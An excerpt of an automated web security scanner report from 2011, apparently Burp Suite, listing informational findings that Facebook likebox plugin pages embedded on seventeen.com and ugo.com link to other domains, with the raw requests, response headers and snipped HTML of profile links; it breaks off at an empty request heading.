<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/VeBlwmWVNjq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/Mz6Me8PDhdq.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ellegirlcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195791_31818566964_586378_q.jpg" alt="ELLEgirl.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002170420953" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274221_100002170420953_96917597_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275857_100001527408802_1622502263_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/herve.pierret" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195310_1228119088_7937752_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260932_100001251454950_866047_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1525705558" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274286_1525705558_987951046_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lululai08" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275123_1347765398_4701879_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000582854763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276081_100000582854763_3807958_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001108186149" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27351_100001108186149_5613_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/273246_100000183238371_1934881_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/akber.rider" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260962_100001031614302_1352206823_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.150. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=112965278727107&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27409829c%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fseventeenmagazine&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.127.41
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:43 GMT
Content-Length: 12405

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/seventeenmagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276630_8028997215_4266660_q.jpg" alt="Seventeen Magazine" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/xoantit" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260906_1495670056_2901777_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/chelsea.eller" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174528_746640099_3984734_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001189293979" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274997_100001189293979_1955214963_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002226585888" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273481_100002226585888_1728111633_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lrod518" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275642_654258881_1752296462_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.151. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.17.124
X-Cnection: close
Date: Sat, 17 Sep 2011 16:43:08 GMT
Content-Length: 13402

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/santingo.munez" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275514_1542670092_2028795952_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.152. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.170.124
X-Cnection: close
Date: Sat, 17 Sep 2011 17:18:08 GMT
Content-Length: 13366

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275687_100000454305252_764701829_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.153. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.68.56
X-Cnection: close
Date: Sat, 17 Sep 2011 16:57:08 GMT
Content-Length: 13350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275687_100000454305252_764701829_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.154. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.51.199
X-Cnection: close
Date: Sat, 17 Sep 2011 17:23:35 GMT
Content-Length: 13405

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.155. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

